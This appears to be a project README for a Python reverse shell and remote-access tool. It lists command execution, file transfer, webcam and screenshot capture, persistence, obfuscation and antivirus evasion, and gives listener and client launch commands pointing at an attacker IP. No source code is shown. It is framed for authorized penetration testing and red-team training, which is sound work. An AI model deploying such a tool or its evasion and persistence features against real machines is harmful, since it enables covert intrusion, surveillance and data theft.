The Reverse Shell is a Python-based remote access utility crafted for ethical hacking, penetration testing, and red-team simulation. It allows an attacker (authorized tester) to remotely execute system commands on a target machine after establishing a reverse TCP connection.
Unlike bind shells, which require open ports on the target, reverse shells initiate the connection from the victim to the attacker's listener—bypassing firewall restrictions and NAT in many cases.
⚠️ DISCLAIMER: This tool is developed strictly for educational purposes, red team simulations, and authorized penetration testing only. Unauthorized use is illegal and unethical.
- 📡 Reverse TCP Connectivity (client connects to server)
- 💻 Command Execution (run shell commands remotely)
- 📂 File Upload/Download Support
- 📸 Take Picture/Screenshots
- 🧠 Gathers OS information
- 🔒 Customizable Port & Host Settings
- 🧵 Multithreaded Listener (optional enhancement)
| Component | Details |
|---|---|
| Language | Python 3 |
| Libraries | socket, os, subprocess, threading, base64, json (for structured comms) |
| OS Support | Linux, Windows, macOS |
| Mode | TCP socket-based |
python3 server.py
# or with specific IP/Port
python3 server.py --host <your_ip> --port 4444This could be manually executed or delivered via a payload in a simulated scenario:
# both IP/Port should be same in server & client side
python3 client.py --host <attacker_ip> --port <attacker_port>Upload (send file to victim):
upload /path/to/local/file.txtDownload (retrieve file from victim):
download C:\\Users\\victim\\file.txt| Feature | Details |
|---|---|
| 🔒 Encrypted payloads | Optionally encode payloads in base64 or AES |
| 🧅 Obfuscation | Use variable obfuscation or sleep intervals |
| 🔁 Persistence | Optional: register to autorun on startup |
| 🔍 Evasion | Mimic legitimate system processes or rename script |
These features should only be used in legal, ethical testing environments.
Install dependencies Most scripts only require built-in libraries:
python3 --versionRun attacker-side listener
python3 listener.pyDeploy or test reverse shell client
python3 reverse_shell.py- 🔴 Red Team Operations
- 🧪 Penetration Testing Labs
- 🎓 Cybersecurity Training
- 🧰 Tool Development in Adversary Simulation
- 📖 Learning C2 (Command and Control) Concepts
- ❗ This software is to be used only under the following circumstances:
- You own the target machine
- You have explicit written permission to test the target
- You're operating in a controlled lab or CTF environment
Misuse of this software can lead to criminal prosecution. The author assumes no responsibility for any unauthorized or malicious use.
- AES or RSA encrypted communication
- Polymorphic payload generator
- GUI shell controller (e.g., PyQT interface)
- Reverse HTTPS support
- Port to Go or Rust for AV evasion
This project is licensed under the MIT License and intended for educational, ethical testing only.